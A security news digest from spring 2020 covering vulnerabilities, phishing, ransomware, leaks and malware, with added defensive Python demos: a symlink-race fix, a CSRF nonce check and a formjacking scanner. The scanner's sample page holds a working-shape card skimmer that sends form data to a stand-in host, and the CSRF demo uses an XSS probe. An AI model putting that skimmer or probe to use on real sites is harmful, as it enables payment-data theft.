Table of Contents

  1. Vulnerabilities
    1. Symlink race bugs discovered in 28 antivirus products
    2. WordPress plugin bug lets hackers create rogue admin accounts
    3. Beware of the GIF: Account Takeover Vulnerability in Microsoft Teams
  2. Phishing
    1. Phishing uses lay-off Zoom meeting alerts to steal credentials
    2. Fake FedEx and UPS delivery issues used in COVID-19 phishing
  3. Ransomware
    1. Lucy malware for Android adds file-encryption for ransomware ops
    2. Colorado Hospital Hit by Ransomware as COVID-19 Continues
    3. Shade Ransomware shuts down, releases 750K decryption keys
  4. Leaks
    1. Number-plate cam site had no password, spills 9M logs of UK road journeys
    2. Warwick University was hacked and kept breach secret from students and staff
  5. Malware
    1. Anatomy of Formjacking Attacks
    2. Hackers are exploiting a Sophos firewall zero-day
    3. Asnarök malware exploits firewall zero-day to steal credentials
  6. Politics
    1. Why a Data-Security Expert Fears U.S. Voting Will Be Hacked
  7. Privacy
    1. Germany flips to Apple-Google approach on smartphone contact tracing

Vulnerabilities

Symlink race bugs discovered in 28 antivirus products

Security researchers from RACK911 Labs said in a report published this week that they found "symlink race" vulnerabilities in 28 of today's most popular antivirus products. RACK911 says the bugs can be exploited by an attacker to delete files used by the antivirus or by the operating system, resulting in crashes or rendering the computer unusable. The vulnerability at the heart of these bugs is called a "symlink race," Dr. Vesselin Bontchev, a member of the National Laboratory of Computer Virology at the Bulgarian Academy of Sciences, told ZDNet.
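Added example, not from the RACK911 report or any of the affected products: a Python demonstration of the deletion pattern behind a symlink race and of a hardened alternative. The scenario (a quarantine folder whose "jobs" subdirectory has been swapped for a symlink to a protected directory) is constructed in a temp directory; the protected files and names are placeholders. The hardened version opens every directory component with O_NOFOLLOW relative to the previous one and unlinks relative to that descriptor, so the file that was checked is the file that is removed. It relies on POSIX dir_fd support (Linux); on Windows the equivalent is opening with FILE_FLAG_OPEN_REPARSE_POINT and deleting by handle.

```python
import os
import stat
import tempfile


def naive_remove(path: str) -> None:
    """The racy pattern: decide on a path string, then act on the same string.

    os.remove() resolves every directory component again, so if a component
    has been swapped for a symlink (or a junction on Windows) between the
    check and the unlink, the file that gets deleted is the symlink's target.
    """
    if os.path.isfile(path):
        os.remove(path)


def hardened_remove(base_dir: str, rel_path: str) -> bool:
    """Delete base_dir/rel_path without following any symlink along the way.

    Each directory component is opened with O_NOFOLLOW|O_DIRECTORY relative to
    the previous descriptor, and the final unlink is done relative to the last
    one. Returns True if a regular file was removed, False if refused.
    """
    parts = [p for p in rel_path.split("/") if p]
    if not parts or any(p in (".", "..") for p in parts):
        return False
    dir_flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    try:
        fd = os.open(base_dir, dir_flags)
    except OSError:
        return False
    try:
        for comp in parts[:-1]:
            # A symlinked component fails with ELOOP here: refused, not followed.
            nfd = os.open(comp, dir_flags, dir_fd=fd)
            os.close(fd)
            fd = nfd
        st = os.lstat(parts[-1], dir_fd=fd)  # lstat: a symlink stays a symlink
        if not stat.S_ISREG(st.st_mode):
            return False
        os.unlink(parts[-1], dir_fd=fd)
        return True
    except OSError:
        return False
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario: quarantine/jobs is a symlink to a protected dir."""
    root = tempfile.mkdtemp()
    protected = os.path.join(root, "protected")
    quarantine = os.path.join(root, "quarantine")
    os.makedirs(protected)
    os.makedirs(quarantine)
    for name in ("a.dat", "b.dat"):
        with open(os.path.join(protected, name), "w") as f:
            f.write("placeholder system file, must survive")
    with open(os.path.join(quarantine, "sample.bin"), "w") as f:
        f.write("placeholder quarantined sample")
    os.symlink(protected, os.path.join(quarantine, "jobs"))

    results = {}
    # Racy deletion of quarantine/jobs/a.dat actually removes protected/a.dat.
    naive_remove(os.path.join(quarantine, "jobs", "a.dat"))
    results["naive_deleted_protected"] = not os.path.exists(
        os.path.join(protected, "a.dat"))
    # Hardened deletion refuses the symlinked component; protected/b.dat survives.
    results["hardened_refused"] = hardened_remove(quarantine, "jobs/b.dat") is False
    results["protected_survived"] = os.path.exists(os.path.join(protected, "b.dat"))
    # A genuine regular file inside the quarantine folder is still removable.
    results["hardened_removed_regular"] = hardened_remove(quarantine, "sample.bin")
    results["regular_gone"] = not os.path.exists(
        os.path.join(quarantine, "sample.bin"))
    return results


if __name__ == "__main__":
    print(demo())
```

The point to take from the demo is that the check (`isfile`) and the action (`remove`) in the naive version operate on a name, not on an object; only a descriptor-relative operation closes that window.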

WordPress plugin bug lets hackers create rogue admin accounts

Owners of WordPress sites are advised to update the Real-Time Find and Replace plugin to prevent attackers from injecting malicious code into their sites and creating rogue admin accounts by exploiting a Cross-Site Request Forgery (CSRF) flaw. The vulnerability is a CSRF that leads to Stored Cross-Site Scripting (Stored XSS) and affects all Real-Time Find and Replace versions up to 3.9. It can be abused to trick WordPress admins into injecting malicious JavaScript into their own websites' pages by clicking a malicious link in a comment or email.
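Added example, not the plugin's or WordPress's own code: a Python sketch of the control that this class of bug is generally missing, an anti-CSRF nonce bound to the admin's session and to the specific action, verified before a state-changing settings write. The endpoint, session ids, secret and rule store are all constructed stand-ins. Because the plugin's job is to inject replacement text into site pages, the nonce check is the decisive control; output escaping is shown only for the admin listing of stored rules.

```python
import hashlib
import hmac
import html
import secrets

# Constructed: a per-deployment secret; WordPress derives its nonces from its
# own salts, this is a stand-in with the same role.
SERVER_SECRET = secrets.token_bytes(32)

# Constructed stand-in for the plugin's stored find/replace pairs.
STORED_RULES = {}


def make_nonce(session_id: str, action: str) -> str:
    """Token tied to the logged-in session and to one specific action."""
    msg = f"{session_id}|{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_nonce(session_id: str, action: str, token) -> bool:
    """Constant-time comparison; a missing token never verifies."""
    return hmac.compare_digest(make_nonce(session_id, action), token or "")


def handle_save_rule(session_id: str, is_admin: bool, form: dict):
    """Admin-only endpoint that stores a find/replace pair. Returns (status, body).

    The browser attaches the session cookie to a cross-site request
    automatically, so the capability check alone does not stop CSRF; the
    nonce, which a third-party page cannot read or forge, does.
    """
    if not is_admin:
        return 403, "forbidden"
    if not verify_nonce(session_id, "save_rule", form.get("_nonce")):
        return 403, "invalid or missing nonce"
    STORED_RULES[form.get("find", "")] = form.get("replace", "")
    return 200, "saved"


def render_rules_page() -> str:
    """Escape stored values on output so a stored payload renders as text."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}</td><td>{html.escape(v)}</td></tr>"
        for k, v in STORED_RULES.items())
    return f"<table>{rows}</table>"


def demo() -> dict:
    admin = "sess-admin-001"  # constructed session id
    payload = "<script>alert(1)</script>"  # the classic stored-XSS probe
    r = {}
    # 1. Cross-site request: cookie rides along, but there is no nonce.
    r["csrf_without_nonce"] = handle_save_rule(
        admin, True, {"find": "x", "replace": payload})[0]
    # 2. A guessed nonce for a session the attacker does not control.
    r["csrf_forged_nonce"] = handle_save_rule(
        admin, True, {"find": "x", "replace": payload, "_nonce": "deadbeef"})[0]
    # 3. Legitimate same-site form submission carrying the real nonce.
    r["legit"] = handle_save_rule(
        admin, True, {"find": "x", "replace": payload,
                      "_nonce": make_nonce(admin, "save_rule")})[0]
    # 4. A valid nonce for a different action is not transferable.
    r["wrong_action"] = handle_save_rule(
        admin, True, {"find": "y", "replace": "z",
                      "_nonce": make_nonce(admin, "delete_rule")})[0]
    r["escaped"] = "<script>" not in render_rules_page()
    return r


if __name__ == "__main__":
    print(demo())
```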

Beware of the GIF: Account Takeover Vulnerability in Microsoft Teams

CyberArk discovered a bug in Microsoft Teams that, if abused together with a subdomain takeover vulnerability, could have let attackers use a malicious GIF to scrape users' data and ultimately take over an organization's entire roster of Teams accounts. Because users would not have to share the GIF, only see it, to be impacted, vulnerabilities like these can spread automatically. This vulnerability would have affected every user of the Teams desktop or web browser version.

Phishing

Phishing uses lay-off Zoom meeting alerts to steal credentials

Zoom users are being targeted by a new phishing campaign that uses fake Zoom meeting notifications to warn corporate employees that their contracts will be suspended or terminated. So far this series of phishing attacks spoofing automated Zoom meeting alerts has landed in the mailboxes of over 50,000 targets, according to researchers at email security company Abnormal Security. Potential victims are more willing to trust such emails at this time, given that many employees are now working from home and take part in daily online meetings through video conferencing platforms like Zoom because of stay-at-home orders and lockdowns caused by the COVID-19 pandemic.

Fake FedEx and UPS delivery issues used in COVID-19 phishing

As people socially isolate and work from home, shopping online and home deliveries have increased. Scammers are capitalizing on this by creating new scams using Coronavirus delivery issues as a lure to get people to visit malicious links or open malware. In a new report by Kaspersky, researchers see a new wave of phishing scams that utilize a COVID-19 theme and impersonate well-known shipping carriers such as FedEx, UPS, and DHL.

Ransomware

Lucy malware for Android adds file-encryption for ransomware ops

A threat actor focusing on Android systems has expanded their malware-as-a-service (MaaS) business with file-encrypting capabilities for ransomware operations. Named Lucy Gang by researchers, the actor is a Russian-speaking team that made itself known two years ago with the Black Rose Lucy service, offering botnet and malware dropping capabilities for Android devices. The new feature allows customers of the service to encrypt files on infected devices and show a ransom note in the browser window asking for $500. The message purports to be from the FBI and accuses the victim of storing adult content on the mobile device.

Colorado Hospital Hit by Ransomware as COVID-19 Continues

Parkview Medical Center was hit with a ransomware attack on April 21, according to Fox 21 News. As of Monday, the hospital's website still displayed a message saying it was "currently experiencing a network outage." A Parkview employee told Fox 21 News that the attack involved ransomware rendering the hospital's patient records systems inoperable.

Shade Ransomware shuts down, releases 750K decryption keys

The operators behind the Shade Ransomware (Troldesh) have shut down their operations, released over 750,000 decryption keys, and apologized for the harm they caused their victims. The Shade Ransomware has been in operation since around 2014. Unlike other ransomware families that specifically avoid encrypting victims in Russia and other CIS countries, Shade predominantly targets people in Russia and Ukraine.

Leaks

Number-plate cam site had no password, spills 9M logs of UK road journeys

The unsecured management dashboard could have been used by anyone who found it to reconstruct a particular vehicle's journey, or series of journeys, from its number plate, right down to the minute, with ease. A malicious person could have renamed the cameras or altered key metadata shown to operators, such as a camera's location, direction, and unique identifying number. Privacy International's Edin Omanovic lamented the privacy-busting potential of the system, telling The Register: "Time and again we've seen the introduction of surveillance tech for very specific purposes, only to creep into other areas of enforcement." Omanovic continued.

Warwick University was hacked and kept breach secret from students and staff

Hackers accessed the University of Warwick's administrative network last year in an attack which has been kept secret from the affected individuals and organizations, Sky News has learned. The security incident occurred when a staff member installed remote-viewing software enabling hackers to steal sensitive personal information on students, staff and even volunteers taking part in research studies. Because cyber security protections at the university were so poor, as per the findings of an internal report revealed by Sky News earlier this month, it was impossible for the university to identify what data had been stolen.

Malware

Anatomy of Formjacking Attacks

The rise of the Internet has changed people's lives in many positive ways, and almost any service can now be found online. That convenience, however, also opens a gate for malware to steal people's confidential information, and more and more malware authors are taking advantage of it. Formjacking, in which cybercriminals inject malicious JavaScript into a compromised website to take over the site's form handling and collect sensitive user input, is one of the fastest-growing forms of cyberattack. It is designed to steal credit card details and other personal information entered into payment forms on the "checkout" pages of e-commerce websites.
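Added example, not from the article: a Python heuristic scanner for the pattern described above, run over a checkout page's HTML. It flags external scripts loaded from hosts outside a constructed allowlist (and allowed third-party scripts that lack a Subresource Integrity attribute), and inline scripts that both read form fields and transmit data on a submit hook. The first-party host, the allowed payment-provider host, and both sample pages are constructed; the skimmer sample is a minimal illustration of the shape detection keys on, not a real payload. Heuristics of this kind produce leads for review, not proof of compromise.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: where a checkout page is expected to load scripts from.
FIRST_PARTY_HOST = "shop.example"
ALLOWED_THIRD_PARTY = {"js.payment-provider.example"}

# Token groups that together characterise form skimming: reading field values,
# hooking submission, and shipping the data somewhere. Spaces are stripped
# before matching so minor formatting differences do not evade the check.
FORM_READ = ("querySelector", "getElementById", "getElementsByTagName",
             "FormData", ".value")
SUBMIT_HOOK = ("addEventListener('submit'", 'addEventListener("submit"',
               "onsubmit", "onclick")
EXFIL = ("XMLHttpRequest", "fetch(", "sendBeacon", "new Image", ".src=")


class ScriptCollector(HTMLParser):
    """Collects external script sources (with SRI presence) and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # (src, has_integrity)
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _has_any(compact_code: str, tokens) -> bool:
    return any(t.replace(" ", "") in compact_code for t in tokens)


def scan_checkout_page(html_text: str) -> list:
    """Return (severity, reason) findings for one page. Heuristic, not proof."""
    p = ScriptCollector()
    p.feed(html_text)
    findings = []
    for src, has_sri in p.external:
        host = urlparse(src).hostname
        if host is None or host == FIRST_PARTY_HOST:
            continue  # relative or first-party URL
        if host not in ALLOWED_THIRD_PARTY:
            findings.append(("high", f"script loaded from unexpected host {host}"))
        elif not has_sri:
            findings.append(("low", f"third-party script {src} has no integrity attribute"))
    for code in p.inline:
        compact = code.replace(" ", "")
        if (_has_any(compact, FORM_READ) and _has_any(compact, SUBMIT_HOOK)
                and _has_any(compact, EXFIL)):
            findings.append(("high", "inline script reads form fields and transmits them on submit"))
    return findings


# Constructed sample pages.
SAMPLE_CLEAN = """<html><head>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://js.payment-provider.example/v1/pay.js" integrity="sha384-PLACEHOLDER"></script>
</head><body><form id="checkout"><input id="card"></form></body></html>"""

SAMPLE_SKIMMED = """<html><head>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://js.payment-provider.example/v1/pay.js"></script>
<script src="https://cdn-stats.invalid/analytics.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = new FormData(document.getElementById('checkout'));
  new Image().src = 'https://cdn-stats.invalid/p?d=' + encodeURIComponent(JSON.stringify([...d]));
});
</script>
</head><body><form id="checkout"><input id="card"></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", SAMPLE_CLEAN), ("skimmed", SAMPLE_SKIMMED)):
        print(name, scan_checkout_page(page))
```

In practice the allowlist comes from the site's build manifest or its Content-Security-Policy, and the scan is run against the page as served to a real browser session, since skimmers are often only injected for certain paths, geographies or user agents.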

Hackers are exploiting a Sophos firewall zero-day

Cyber-security firm Sophos published an emergency security update on Saturday to patch a zero-day vulnerability in its XG enterprise firewall product that was being abused in the wild. Sophos said it first learned of the zero-day late on Wednesday, April 22, after receiving a report from one of its customers. The customer reported seeing "a suspicious field value visible in the management interface." After investigating the report, Sophos determined this was an active attack and not an error in its product.

Asnarök malware exploits firewall zero-day to steal credentials

Some Sophos firewall products were attacked with a new Trojan, dubbed Asnarök by researchers at cyber-security firm Sophos, to steal usernames and hashed passwords starting on April 22, according to an official timeline. The malware exploits a zero-day SQL injection vulnerability that can lead to remote code execution on any unpatched physical or virtual firewall it targets. "There was significant orchestration involved in the execution of the attack, using a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for a firewall operating system," Sophos said in an advisory published over the weekend.

Politics

Why a Data-Security Expert Fears U.S. Voting Will Be Hacked

In 2005, a concerned Florida election supervisor asked the Finnish data-security expert Harri Hursti to hack into one of the state's commonly used voting machines to test its vulnerability. The verdict wasn't reassuring. By modifying just a few lines of code on the machine's memory card, Mr. Hursti says, he could change the results of a mock election. That same model, he adds, will be among those used in the 2020 elections. (A spokesperson for the machine's vendor, Dominion Voting, says that these weaknesses were fixed in 2012, but Mr. Hursti says that he has tested the new version and found the updates insufficient.)

Privacy

Germany flips to Apple-Google approach on smartphone contact tracing

Countries are rushing to develop apps that give a detailed picture of the risk of catching the Coronavirus, as the chain of infection is proving hard to break because the virus can be spread by people showing no symptoms. Chancellery Minister Helge Braun and Health Minister Jens Spahn said in a joint statement that Berlin would adopt a "decentralized" approach to digital contact tracing, abandoning a home-grown alternative that would have given health authorities central control over tracing data. In Europe, most countries have chosen short-range Bluetooth "handshakes" between mobile devices as the best way of registering a potential contact, even though this provides no location data. But they have disagreed about whether to log such contacts on individual devices or on a central server, which would be more directly useful to existing contact tracing teams that work the phones and knock on doors to warn those who may be at risk.